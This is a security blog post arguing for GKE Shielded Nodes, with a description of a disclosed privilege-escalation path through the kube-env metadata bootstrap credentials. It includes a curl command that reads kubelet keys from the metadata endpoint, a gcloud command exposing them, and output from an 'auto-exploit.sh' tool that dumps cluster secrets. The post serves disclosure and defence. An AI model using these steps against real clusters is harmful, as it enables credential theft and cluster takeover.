...

Why You Should Enable GKE Shielded Nodes Today

25 August 2020

When Shielded GKE Nodes is enabled, the GKE control plane cryptographically verifies that every node in the cluster is a virtual machine running in a managed instance group in Google’s data center and that the kubelet is only getting the certificate for itself. But Shielded GKE Nodes addresses a much bigger problem.

And I quote

From the GKE documentation:

“Without Shielded GKE Nodes an attacker can exploit a vulnerability in a Pod to exfiltrate bootstrap credentials and impersonate nodes in your cluster, giving the attackers access to cluster secrets.”

The way this is worded is technically correct, but it only identifies one of several possible preconditions for this attack to be successful. Namely, a compromised Pod. But if we dig a little deeper, we can see there are more that are commonly available in most environments.

Kube-Env

As GKE is actually a Google Cloud service that runs “on top” of Google Compute Engine, GKE Shielded Nodes leverage the underlying capabilties of GCE Shielded VMs. GKE also leverages a feature of GCE called Custom Instance Metadata to host small amounts of data that the virtual machine can access via a web request to a URL only accessible to the GCE virtual machine. Specifically, the data needed to “bootstrap” or have GCE nodes join the GKE cluster and show up as ready to handle GKE workloads. The custom attribute named kube-env is what holds the initial set of credentials used for this purpose.

The Bootstrapping Process

When a GKE node (a GCE virtual machine with specific configuration) first starts, the initial configuration scripts do several things to prepare the node to be a GKE worker node, and they use the custom metadata kube-env file to obtain a list of important settings. Inside the kube-env file is a CA certificate and a public/private certificate pair. This keypair is first used by the kubelet to “bootstrap” itself. That is, the kubelet will generate a new keypair and use the keypair from kube-env to submit a CertificateSigningRequest to the API server. If the certificate matches the proper structure and naming conventions, the GKE control plane will autoapprove the node’s CSR, and the kubelet can fetch and use that new keypair to join the cluster.

Where This Goes Sideways

  1. The default configuration of GKE clusters provides no method for blocking access to the GCE Instance Metadata. In most GKE clusters, any Pod running on a node will have direct access to this metadata as from the perspective of the Metadata API, it’s just another process running on the node.

    [email protected]:/# curl -s -H "Metadata-flavor: Google" 169.254.169.254/computeMetadata/v1/instance/attributes/kube-env | grep ^KUBELET
    KUBELET_CERT: LS0tLS...snip...
    KUBELET_KEY: LS0tLS..snip...
    
  2. Second, the GKE control plane in non-shielded node clusters does not validate the hostname in the CSR matches the hostname that is requesting the keypair. In other words, if one can access one node’s kubelet bootstrapping keypair, they can create valid keypairs for all nodes in the cluster if they know the hostnames.

  3. Finally, the kubelet is responsible for running workloads, so it needs the ability to fetch secrets that are attached to pods as long as they are currently scheduled on it to perform its intended task.

If one could generate valid kubelet keypairs for all nodes in the cluster, they could iterate through each and grab all the cluster secrets attached to pods running on all the nodes. In practical terms, that’s the close to the same access provided by kubectl get secrets --all-namespaces. In nearly all clusters, at least one Kubernetes Service Account is bound to a privileged RBAC ClusterRole like cluster-admin.

In default GKE clusters, this means that any Pod has a direct path to escalate to cluster-admin without requiring authentication. As cluster-admin, the user controls all data and applications running on the GKE workers as well as the union of all permissions associated with credentials attached to Pods running in the cluster. At best, it’s free compute. At worst, it’s a launch point for full GCP account takeover.

How Long Has This Been Known?

In November of 2018, this attack path was privately disclosed to the Google Vulnerability Reward Program by Darkbit’s own Brad Geesaman. That same week (coincidentally), the team at 4Armed publicly wrote up their findings on this issue. The Google VRP Team did not award a bounty as it was already identified internally as a known issue.

Kube-env-stealer

At the time of initial disclosure, a proof-of-concept utility was created called https://github.com/bgeesaman/kube-env-stealer, but it was not made public for six months to coincide with the release of the GKE Metadata Concealment Proxy.

The kube-env-stealer is a set of scripts and a Pod deployment that automates the following process:

  1. Creates a Pod using an nginx:latest image inside the current GKE cluster
  2. Copies a script to the new Pod
  3. Runs the script and wraps the extracted cluster secrets and data into a single tarball
  4. Copies the tarball to the local directory
  5. Deletes the Pod.
$ ./auto-exploit.sh 
deployment.apps/evil-pod created
deployment.extensions/evil-pod condition met
[[ Checking if curl exists ]]
[[ Checking if awk exists ]]
[[ Checking if sed exists ]]
[[ Checking if grep exists ]]
[[ Checking if base64 exists ]]
[[ Checking if openssl exists ]]
[[ Obtain kube-env ]]
[[ Source kube-env ]]
[[ Get bootstrap certificate data ]]
[[ Get kubectl binary ]]
[[ Obtain the Hostname ]]
[[ Create nodes/gke-notshielded-default-pool-144c7d3a-4pql/openssl.cnf ]]
[[ Generate EC kubelet keypair for gke-notshielded-default-pool-144c7d3a-4pql ]]
[[ Generate CSR for gke-notshielded-default-pool-144c7d3a-4pql ]]
[[ Generate CSR YAML for gke-notshielded-default-pool-144c7d3a-4pql ]]
[[ Submit CSR and Generate Certificate for gke-notshielded-default-pool-144c7d3a-4pql ]]
certificatesigningrequest.certificates.k8s.io/node-csr-gke-notshielded-default-pool-144c7d3a-4pql-75BB created
[[ Sleep 2 while being approved ]]
[[ Download approved Cert for gke-notshielded-default-pool-144c7d3a-4pql ]]
[[ Dumping secrets mounted to gke-notshielded-default-pool-144c7d3a-4pql ]]
Exporting secrets/default-default-token-cfpft.json
Exporting secrets/kube-system-default-token-fhlb2.json
Exporting secrets/kube-system-event-exporter-sa-token-zml6x.json
Exporting secrets/kube-system-fluentd-gcp-scaler-token-tsnc6.json
Exporting secrets/kube-system-fluentd-gcp-token-pwmsz.json
Exporting secrets/kube-system-heapster-token-dphxp.json
Exporting secrets/kube-system-kube-dns-autoscaler-token-fltl5.json
Exporting secrets/kube-system-kube-dns-token-wphxh.json
Exporting secrets/kube-system-metadata-agent-token-2x6tk.json
Exporting secrets/kube-system-metrics-server-token-w4wbh.json
Exporting secrets/kube-system-prometheus-to-sd-token-n7tlv.json
[[ Download a full pod listing ]]
[[ Get node names ]]
[[ Iterate through all other node names ]]
[[ Extracting namespace, podname, and secret listing ]]
drwxr-xr-x  0 root   root        0 Aug 25 12:38 dumps/
-rw-r--r--  0 root   root   126965 Aug 25 12:38 dumps/allpods.json
-rw-r--r--  0 root   root      847 Aug 25 12:38 dumps/ns-pod-secret-listing.txt
drwxr-xr-x  0 root   root        0 Aug 25 12:38 secrets/
-rw-r--r--  0 root   root     3558 Aug 25 12:38 secrets/kube-system-event-exporter-sa-token-zml6x.json
-rw-r--r--  0 root   root     3476 Aug 25 12:38 secrets/kube-system-default-token-fhlb2.json
-rw-r--r--  0 root   root     3483 Aug 25 12:38 secrets/kube-system-heapster-token-dphxp.json
-rw-r--r--  0 root   root     3551 Aug 25 12:38 secrets/kube-system-prometheus-to-sd-token-n7tlv.json
-rw-r--r--  0 root   root     3508 Aug 25 12:38 secrets/kube-system-fluentd-gcp-token-pwmsz.json
-rw-r--r--  0 root   root     3565 Aug 25 12:38 secrets/kube-system-fluentd-gcp-scaler-token-tsnc6.json
-rw-r--r--  0 root   root     3483 Aug 25 12:38 secrets/kube-system-kube-dns-token-wphxh.json
-rw-r--r--  0 root   root     3533 Aug 25 12:38 secrets/kube-system-metadata-agent-token-2x6tk.json
-rw-r--r--  0 root   root     3576 Aug 25 12:38 secrets/kube-system-kube-dns-autoscaler-token-fltl5.json
-rw-r--r--  0 root   root     3448 Aug 25 12:38 secrets/default-default-token-cfpft.json
-rw-r--r--  0 root   root     3533 Aug 25 12:38 secrets/kube-system-metrics-server-token-w4wbh.json
deployment.apps "evil-pod" deleted

The entire process takes roughly 20-60 seconds depending on the number of nodes in the cluster, and the only required permission is pod create in any namespace.

Partial Solutions

At the time, the GKE Metadata Concealment Proxy was the stop-gap fix. It’s functionality was later wrapped into Workload Identity. Essentially, it blocked access from Pods trying to access the sensitive Metadata API endpoints like kube-env.

However, if no Admission Control is in place, a Pod that specifies running on the host network can still access the Instance Metadata API as before and bypass these two solutions.

As mentioned in the beginning of this post, a Pod is only one way to gain access to the GCE Instance Metadata. There are other IAM Roles that can grant direct access to the GCE Instance Metadata Attributes without having to be a Pod inside the cluster. Namely, the roles that grant compute.instances.get in the same project as the cluster can also access the kube-env directly from the GCP API.

$ gcloud compute instances describe gke-notshielded-default-pool-144c7d3a-4pql
..snip..
id: '4278918789669244206'
kind: compute#instance
..snip..
metadata:
  items:
    ..snip..
  - key: kube-env
    value: |
      ..snip..
      CA_CERT: LS0tLS1..snip..
      KUBELET_CERT: LS0tLS1..snip..
      KUBELET_KEY: LS0tLS1..snip..
      ..snip..
  kind: compute#metadata
name: gke-notshielded-default-pool-144c7d3a-4pql
..snip..
status: RUNNING
zone: https://www.googleapis.com/compute/v1/projects/gke-c2/zones/us-central1-c

If a malicious user compromised other valid credentials with this permission and the GKE API Server is network-accessible or “public” (also, a default configuration), they can perform the same attack without needing to be inside the cluster. This variant is handled with a slightly modified script that is also available in the kube-env-stealer repository

The More Complete Solution

Enter GKE Shielded Nodes. Aside from all of it’s validation benefits, the key change is that the kube-env no longer holds the sensitive kubelet bootstrapping credentials. Those are now distributed via the vTPM chip running on the hardware and are only accessible by processes on the node with root permissions.

Per the GKE Shielded Nodes documentation, Shielded Nodes will be the default starting in GKE 1.18. As of this writing, the latest possible version in the rapid channel is 1.17, so it is not the default just yet. However, you can enable GKE Shielded Nodes in your cluster starting with GKE 1.13.6-gke.0 as an upgrade operation or when creating a new cluster.

Conclusion

The GKE Platform has recently solved a serious privilege escalation path in most default GKE clusters, and GKE customers should strongly consider enabling GKE Shielded Nodes to improve the defense-in-depth posture of their GKE environment.